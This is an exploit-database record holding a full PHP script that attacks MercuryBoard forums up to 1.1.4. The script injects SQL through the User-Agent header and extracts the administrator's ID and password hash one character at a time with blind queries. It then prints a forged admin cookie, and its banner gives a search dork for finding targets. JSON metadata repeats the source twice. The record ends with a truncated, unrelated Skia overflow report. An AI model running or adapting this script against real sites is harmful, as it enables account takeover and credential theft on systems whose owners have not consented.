ID 1337DAY-ID-736 Type zdt Reporter rgod Modified 2006-08-23T00:00:00
Description
Exploit for MercuryBoard <= 1.1.4 (a PHP/MySQL web application; the script itself is platform-independent) in category web applications
===============================================================
MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit
===============================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
// Banner: exploit name, author and the search "dork" used to locate installs.
// The file opens with a short "<?" tag and relies on the shebang's
// "-d short_open_tag=on"; run it through that shebang or switch to "<?php".
// print_r() on a plain string simply prints it, so echo is equivalent.
echo '
--------------------------------------------------------------------------------
MercuryBoard <= 1.1.4 "User-Agent" SQL injection / privilege escalation exploit
(php version)
by rgod [email protected]
site: http://retrogod.altervista.org
dork: "Powered by MercuryBoard"
--------------------------------------------------------------------------------
';
/*
works regardless of php.ini settings: the payload travels in the User-Agent
header, which magic_quotes_gpc does not escape (it only covers GET/POST/COOKIE)
requires MySQL 4.1 or later (the payload relies on subqueries)
the existing public exploit did not work for me, so I wrote this version
at the time of writing the vulnerability is unpatched...
*/
// Refuse to run without at least a target host and a board path; print the
// usage text instead. Only point this at systems you are authorised to test.
if ($argc < 3) {
    echo '
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to MercuryBoard
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Examples:
php '.$argv[0].' localhost /mercury/
php '.$argv[0].' localhost /mercury/ -p81
php '.$argv[0].' localhost / -P1.1.1.1:80
--------------------------------------------------------------------------------
';
    exit;
}
// Hide notices/warnings, never let the script time out (the blind extraction
// below issues one request per candidate byte, sleeping 1s on every hit) and
// cap each socket wait at 5 seconds.
error_reporting(0);
ini_set('max_execution_time', 0);
ini_set('default_socket_timeout', 5);
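/**
 * Renders $string as a two-part hex dump: first every byte as two-digit
 * lowercase hex, then the printable ASCII view (bytes <= 0x20 or > 0x7e are
 * shown as '.'), each part wrapped with "\r\n" after every 15th byte and the
 * two parts joined by "\r\n". Not called anywhere in this script; it is a
 * leftover debugging helper for eyeballing raw responses.
 *
 * Changes vs. the original: the byte test used the bitwise '|' on two
 * booleans (works, but by accident); the dechex() length test is replaced by
 * sprintf('%02x'), which produces the same zero-padded output.
 *
 * @param string $string raw bytes to dump
 * @return string hex lines, "\r\n", then the ASCII lines
 */
function quick_dump($string)
{
    $ascii = '';
    $hex = '';
    $len = strlen($string);
    for ($i = 0; $i < $len; $i++) {
        $byte = ord($string[$i]);
        // Logical OR: control chars, space and anything above DEL become '.'.
        $ascii .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$i];
        // %02x zero-pads values below 0x10 exactly like the original branch did.
        $hex .= sprintf(' %02x', $byte);
        // Wrap both columns after every 15th byte.
        if (($i + 1) % 15 == 0) {
            $ascii .= "\r\n";
            $hex .= "\r\n";
        }
    }
    return $hex . "\r\n" . $ascii;
}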
// Proxy must look like dotted-quad:port. The surrounding parentheses are the
// PCRE delimiters (PHP accepts bracket-style delimiters), not a capture group.
// The pattern is only \b-anchored: octet ranges are not checked
// (999.999.999.999:1 passes) and trailing text after the port is not rejected.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
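/**
 * Sends one raw HTTP request and captures the whole raw response.
 *
 * Connects either directly to $host:$port or, when $proxy is set, to the proxy
 * (which must match $proxy_regex, i.e. ip:port), writes $packet and reads until
 * the server closes the connection. The complete response (status line,
 * headers and body) is left in the global $html; nothing is returned. Dies
 * with a short message when the connection cannot be opened.
 *
 * Fixes vs. the original: eregi() was removed in PHP 7, and the proxy read
 * loop could spin forever — its condition was "not EOF OR no \r\n\r\n seen",
 * which at EOF only becomes false if the header terminator is present, so a
 * reply without one (or a truncated reply) never ended the loop. Both paths
 * now read to EOF, which the direct path always did and which every request
 * asks for via "Connection: Close".
 *
 * @param string $packet complete HTTP request text, headers ended by a blank line
 * @return void the response is stored in global $html
 */
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy == '') {
        // gethostbyname() returns the input unchanged on failure, in which case
        // fsockopen() fails and we die below. The port is cast so a stray
        // non-numeric -p value cannot be passed through untouched.
        $ock = fsockopen(gethostbyname($host), (int)$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
        }
    } else {
        if (!preg_match($proxy_regex, $proxy)) {
            echo 'Not a valid proxy...'; die;
        }
        list($proxy_host, $proxy_port) = explode(':', $proxy, 2);
        echo "Connecting to ".$proxy_host.":".$proxy_port." proxy...\r\n";
        $ock = fsockopen($proxy_host, (int)$proxy_port);
        if (!$ock) {
            echo 'No response from proxy...'; die;
        }
    }
    fputs($ock, $packet);
    // Read the full reply until the peer closes; each read is bounded by
    // default_socket_timeout (set to 5s at the top of the script).
    $html = '';
    while (!feof($ock)) {
        $html .= fread($ock, 8192);
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
}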
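// Positional arguments: target host and the board's path (must start and end
// with '/'). Options are single tokens: -p<port> and -P<ip:port>.
$host = $argv[1];
$path = $argv[2];
$port = 80;
$proxy = "";
for ($i = 3; $i < $argc; $i++) {
    // substr() instead of $argv[$i][0].$argv[$i][1]: a one-character token no
    // longer reads past the end of the string (a notice the original only hid
    // via error_reporting(0)).
    $flag = substr($argv[$i], 0, 2);
    $value = substr($argv[$i], 2);
    if ($flag == "-p") {
        // Keep the port numeric; the original stored whatever followed -p.
        $port = (int)$value;
    }
    if ($flag == "-P") {
        // The original used str_replace("-P", ...), which would also strip a
        // "-P" occurring inside the value; take everything after the flag.
        $proxy = $value;
    }
}
// Guard the empty-path case explicitly instead of indexing into "" .
if ($path == '' or $path[0] <> '/' or substr($path, -1) <> '/') {echo 'Error... check the path!'; die;}
// Through a proxy the request line must carry an absolute URL.
if ($proxy == '') {$p = $path;} else {$p = 'http://'.$host.':'.$port.$path;}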
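// Probe: a lone single quote in User-Agent. On a vulnerable install the
// resulting MySQL error page echoes the failing "REPLACE INTO <prefix>active"
// statement (the header value is, presumably, written into the active-users
// table unescaped); the table prefix is recovered from that text for the
// queries that follow.
$packet  = "GET ".$p."index.php?a=active HTTP/1.0\r\n";
$packet .= "User-Agent: '\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
// stripos() replaces eregi(), which was removed in PHP 7.
if (stripos($html, "REPLACE INTO") === false) {
    die("not vulnerable...\n");
}
echo "vulnerable...\n";
// NOTE(review): the match above is case-insensitive but these explode() calls
// are not, exactly as in the original — a lowercase error text yields no prefix.
$temp = explode("REPLACE INTO ", $html);
$temp2 = explode("active", $temp[1]);
$prefix = $temp2[0];
echo "prefix -> ".$prefix."\n"; sleep(1);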
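// Blind, boolean-based extraction of the admin's (user_group=1) user_id one
// byte at a time. Candidates: NUL first — ASCII(SUBSTRING(x,j,1)) is 0 once j
// runs past the end of the value, which terminates the loop — then digits.
$ch = array_merge(array(0), range(48, 57));
$j = 1;
$id = "";
echo "building the admin cookie...\nid: ";
while (!strstr($id, chr(0))) {
    $found = false;
    // Same candidate order as the original 0..255 scan filtered by in_array().
    foreach ($ch as $i) {
        $packet  = "GET ".$p."index.php?a=active HTTP/1.0\r\n";
        // Looks like it closes the VALUES tuple the application opened around
        // the User-Agent and appends a second tuple whose last column is a
        // subquery: 'suntzu' when the guessed byte is right, 'suntzoi' otherwise.
        $packet .= "User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,".$j.",1))=".$i."),'suntzu','suntzoi'))/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1))/*\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        sendpacketii($packet);
        // stripos() replaces eregi(), removed in PHP 7. Subqueries need MySQL 4.1+.
        if (stripos($html, "You have an error in your SQL syntax near 'SELECT") !== false) {
            die("\nWrong MySql version, sorry...");
        }
        // A correct guess is signalled by the page no longer rendering its
        // normal "Viewing the active users" text (presumably the extra row
        // breaks the page — TODO confirm against MercuryBoard's schema).
        if (stripos($html, "Viewing the active users") === false) {
            $id .= chr($i);
            echo chr($i);
            sleep(1);
            $found = true;
            break;
        }
    }
    // The original tested $i==255 after a for loop that exits with $i==256,
    // so it never fired: a miss advanced $j and hammered the target forever.
    if (!$found) {
        die("\nExploit failed...");
    }
    $j++;
}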
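// Same blind extraction for user_password. The prompt below calls it md5 and
// the candidate set is NUL, 0-9, a-f, i.e. the stored value is treated as an
// MD5 hex digest. The cookie printed at the end carries this hash directly,
// so the plaintext password is never needed.
$chars = array_merge(array(0), range(48, 57), range(97, 102));
$j = 1;
$password = "";
echo "\npassword (md5): ";
while (!strstr($password, chr(0))) {
    $found = false;
    // Same candidate order as the original 0..255 scan filtered by in_array().
    foreach ($chars as $i) {
        $packet  = "GET ".$p."index.php?a=active HTTP/1.0\r\n";
        $packet .= "User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,".$j.",1))=".$i."),'suntzu','suntzoi'))/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1))/*\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        sendpacketii($packet);
        // stripos() replaces eregi(), removed in PHP 7; a correct guess makes
        // the page drop its normal "Viewing the active users" text.
        if (stripos($html, "Viewing the active users") === false) {
            $password .= chr($i);
            echo chr($i);
            sleep(1);
            $found = true;
            break;
        }
    }
    // The original compared $i to 255 after a loop that leaves $i at 256, so a
    // miss was never detected and the loop ran forever.
    if (!$found) {
        die("\nExploit failed...");
    }
    $j++;
}
// The NUL that terminated each loop is not part of the value; strip it so the
// printed cookie can be pasted as-is (the original printed the raw NUL bytes).
$id = rtrim($id, "\0");
$password = rtrim($password, "\0");
echo "\nyour admin cookie:\n mercury_user=$id; mercury_pass=$password;\n";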
?>
{"published": "2006-08-23T00:00:00", "id": "1337DAY-ID-736", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:31:14", "bulletin": {"published": "2006-08-23T00:00:00", "id": "1337DAY-ID-736", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-19T02:31:14", "vector": "AV:L/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "995730d39f32837b50a6814285ba47fff9c1c22c3b2fcc2259f479fcd5a8fca5", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:31:14", "edition": 1, "title": "MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit", "href": "http://0day.today/exploit/description/736", "modified": "2006-08-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "http://0day.today/exploit/736", "references": [], "reporter": "rgod", "sourceData": "===============================================================\r\nMercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nMercuryBoard <= 1.1.4 \"User-Agent\" SQL injection / privilege escalation exploit\r\n(php version)\r\nby rgod rgod@autistici.org\r\nsite: http://retrogod.altervista.org\r\ndork: \"Powered by MercuryBoard\"\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL > 4.1 (allowing subs)\r\nnot working for me, so I wrote my version\r\nvulnerability is actually unpatched...\r\n*/\r\n\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' 
host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to MercuryBoard\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExamples:\r\nphp '.$argv[0].' localhost /mercury/\r\nphp '.$argv[0].' localhost /mercury/ -p81\r\nphp '.$argv[0].' localhost / -P1.1.1.1:80\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n 
#debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: '\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"REPLACE INTO\",$html))\r\n{\r\necho \"vulnerable...\\n\";\r\n$temp=explode(\"REPLACE INTO \",$html);\r\n$temp2=explode(\"active\",$temp[1]);\r\n$prefix=$temp2[0];\r\necho \"prefix -> \".$prefix.\"\\n\";sleep(1);\r\n}\r\nelse\r\n{\r\ndie(\"not vulnerable...\\n\");\r\n}\r\n\r\n$ch[0]=0;//null\r\n$ch=array_merge($ch,range(48,57)); //numbers\r\n$j=1;\r\n$id=\"\";\r\necho \"building the admin cookie...\\nid: \";\r\nwhile (!strstr($id,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$ch))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"You have an error in your SQL syntax near 'SELECT\",$html))\r\n{die(\"\\nWrong MySql version, sorry...\");}\r\nif (!eregi(\"Viewing the active users\",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit 
failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\necho \"\\npassword (md5): \";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (!eregi(\"Viewing the active users\",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\necho \"\\nyour admin cookie:\\n mercury_user=$id; mercury_pass=$password;\\n\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f56987f4986db4e8c8c139b95e0228f9", "key": "sourceData"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "0280c4d4eb9bba482901450f73ca1922", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "modified"}, {"hash": "7e20f5817bb52696c74ad6a3f7977197", "key": "title"}, {"hash": "db922059e8fc0bd66cac9e3660863428", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", 
"hash": "ebc234b82f4e6ff74433f20e87530143043a81cb5c0717a941216babb12fbeff", "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2018-04-10T09:50:42"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32141", "1337DAY-ID-30541", "1337DAY-ID-28948", "1337DAY-ID-27797", "1337DAY-ID-27576"]}, {"type": "nessus", "idList": ["ACTIVEMQ_5_15_5.NASL", "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "VIRTUOZZO_VZLSA-2017-0021.NASL", "EULEROS_SA-2017-1007.NASL", "EULEROS_SA-2017-1008.NASL", "DEBIAN_DSA-3818.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:44846", "EDB-ID:43111", "EDB-ID:42021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148068", "PACKETSTORM:144878"]}, {"type": "seebug", "idList": ["SSV:97208"]}, {"type": "kaspersky", "idList": ["KLA11098"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}], "modified": "2018-04-10T09:50:42"}, "vulnersScore": -0.6}, "type": "zdt", "lastseen": "2018-04-10T09:50:42", "edition": 2, "title": "MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit", "href": "https://0day.today/exploit/description/736", "modified": "2006-08-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 17, "cvelist": [], "sourceHref": "https://0day.today/exploit/736", "references": [], "reporter": "rgod", "sourceData": "===============================================================\r\nMercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit\r\n===============================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nMercuryBoard <= 1.1.4 \"User-Agent\" SQL injection / privilege escalation exploit\r\n(php version)\r\nby rgod [email\u00a0protected]\r\nsite: http://retrogod.altervista.org\r\ndork: \"Powered by 
MercuryBoard\"\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL > 4.1 (allowing subs)\r\nnot working for me, so I wrote my version\r\nvulnerability is actually unpatched...\r\n*/\r\n\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to MercuryBoard\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExamples:\r\nphp '.$argv[0].' localhost /mercury/\r\nphp '.$argv[0].' localhost /mercury/ -p81\r\nphp '.$argv[0].' localhost / -P1.1.1.1:80\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to 
\".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: '\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"REPLACE INTO\",$html))\r\n{\r\necho \"vulnerable...\\n\";\r\n$temp=explode(\"REPLACE INTO \",$html);\r\n$temp2=explode(\"active\",$temp[1]);\r\n$prefix=$temp2[0];\r\necho \"prefix -> \".$prefix.\"\\n\";sleep(1);\r\n}\r\nelse\r\n{\r\ndie(\"not vulnerable...\\n\");\r\n}\r\n\r\n$ch[0]=0;//null\r\n$ch=array_merge($ch,range(48,57)); //numbers\r\n$j=1;\r\n$id=\"\";\r\necho \"building the admin cookie...\\nid: \";\r\nwhile (!strstr($id,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$ch))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 
666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_id,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (eregi(\"You have an error in your SQL syntax near 'SELECT\",$html))\r\n{die(\"\\nWrong MySql version, sorry...\");}\r\nif (!eregi(\"Viewing the active users\",$html)) {$id.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\necho \"\\npassword (md5): \";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet=\"GET \".$p.\"index.php?a=active HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: 666','suntzu'),(1,'active',0,'','','',(SELECT(IF((ASCII(SUBSTRING(user_password,\".$j.\",1))=\".$i.\"),'suntzu','suntzoi'))/**/FROM/**/\".$prefix.\"users/**/WHERE/**/user_group=1))/*\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (!eregi(\"Viewing the active users\",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}\r\n}\r\nif ($i==255) {die(\"\\nExploit failed...\");}\r\n}\r\n$j++;\r\n}\r\necho \"\\nyour admin cookie:\\n mercury_user=$id; mercury_pass=$password;\\n\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "4544196b6d2b7e187f4b98f0616b2219", "key": "href"}, {"hash": "be59851c096660fb746a91f9cf5e3588", "key": "modified"}, 
{"hash": "be59851c096660fb746a91f9cf5e3588", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "ec5e6c04c1e89705cb44984dede7b27e", "key": "sourceData"}, {"hash": "38262308515fb51c8c218547cf9f9057", "key": "sourceHref"}, {"hash": "7e20f5817bb52696c74ad6a3f7977197", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-02-25T06:30:28", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-02-07T00:00:00", "published": "2019-02-07T00:00:00", "id": "1337DAY-ID-32141", "href": "https://0day.today/exploit/description/32141", "title": "Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows Exploit", "type": "zdt", "sourceData": "I was looking into the root cause of https://bugs.chromium.org/p/chromium/issues/detail?id=850350. In that bug, due to precision errors, Skia generated a concave RRect, but declared it convex. Later, the RRect was transformed with an affine transform and used as a clipping region for drawing. Because the convex path filling algorithm was used while the path was actually concave, this broke some assumptions and led to a stack out-of-bounds write.\r\n\r\nThe bug was fixed by addressing the precision errors in RRect generation. However, there is another subtle issue:\r\n\r\nIf Skia ever declares a path convex, the convexity attribute is going to survive affine transforms. Normally, in geometry, transforming a convex path with an affine transform is always going to result in a convex path. However, in Skia, due to precision limitations, that assumption might be incorrect because:\r\n\r\n a) Due to precision errors, Skia may declare a polygon with tiny concavities to be convex. Using an affine transform, the concavities can then be rotated and enlarged.\r\n b) It might be possible, that due to precision errors, applying an affine transform on a convex path might result in tiny concavities that can be blown up by subsequent transformations.\r\n\r\nThere are possible multiple places where using a concave polygon with incorrect convexity attribute might lead to problems. The one I used in the PoC is the same as in 